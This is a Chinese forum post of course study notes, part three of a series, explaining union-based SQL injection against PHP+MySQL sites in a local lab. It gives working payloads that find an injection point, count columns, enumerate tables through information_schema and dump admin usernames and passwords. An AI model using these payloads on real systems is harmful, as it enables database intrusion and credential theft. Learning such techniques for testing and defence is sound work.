设为首页 收藏本站
查看: 1015|回复: 0

[经验分享] SQL注入漏洞的分析与利用(三)

[复制链接]

尚未签到

发表于 2018-10-19 12:30:06 | 显示全部楼层 |阅读模式
MySQL数据库:
  元数据库information_schema
  1.在5.0以后版本的MySQL中存在着一个元数据库information_schema,其中存储着用户在MySQL中创建的所有其他数据库的信息
  2.在对php+mysql类网站进行注入时,主要就是针对information_schema数据库进行操作
  information_schema中比较重要的数据表
  1.schemata:用于存放所有数据库的名字
  2.tables:用于存放所有数据库中的数据表的名字
  3.columns:用于存放所有数据库的所有数据表中所有字段的名字

php+mysql注入
  实验环境:
  实验平台: NPMserv(必须放在根目录下使用)
  目标网站: 平台上的网站
  MySQL基本操作
  1.select version();  查看mysql版本
  2.select user();  查看当前用户
  3.select database(); 查看当前打开的数据库
  4.show database;  查看mysql中共有那些数据库
  5.use test;   打开test数据库
  6.show tables;  显示数据库中的表
  常规操作
  判断可显示字段
  union select 1,2,3,4
  MySQL中在执行联合查询时,后面的查询语句不必非要指定数据表名,这点区别于Access
  所以可执行:
DSC0000.jpg

  1.判断是否为注入点
DSC0001.jpg

  显示正常
DSC0002.jpg

  显示不正常
  由此可以判断出是一个注入点
  2.使用order by 猜出字段数
DSC0003.jpg

  可知字段数为4
  3.执行union查询
DSC0004.jpg

  不必非要指定数据表的名字
DSC0005.jpg

  在前面加一个and 1=2使得页面得出后面的内容
  因为元数据库只有在5.0版本之后才有,所以要得到数据库版本
DSC0006.jpg

DSC0007.jpg

  4.爆出敏感信息
  1.爆出当前用户名和数据库名
  union select 1,2,user(),database(),4
  2.爆出govcn数据库中包含的数据表
  union select 1,table_name,3,4 from information_schema.tables where table_schema="govcn"
  通过group_concat()函数可以显示字段中的所有内容。
DSC0008.jpg

  得出结果:
DSC0009.jpg

  5.利用information_schema查看其他数据库的内容
  1.查看test数据库中包含了那些表
  select table_name from information_schema.tables where table_schema="test";
  2.查看hack数据表中包含了哪些字段
  select column_name from information_schema.columns where table_name="hack";
  爆字段名:
  union  select  1,username,password,4 from  information_schema.columns where table_name="admin"
  爆用户名和密码
  

union select 1,username,password,4 from admin  
union select 1,unhex(hex(username)),unhex(hex(password)),5 from admin
  

  利用unhex(hex())函数进行编码转换,解决网站编码不一致的问题
DSC00010.jpg

  我的博客是www.hellolb.top
  曲广平老师课程的学习笔记



运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-623651-1-1.html 上篇帖子: SQL注入漏洞的分析与利用(二) 下篇帖子: SOL Server数据库库部署
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表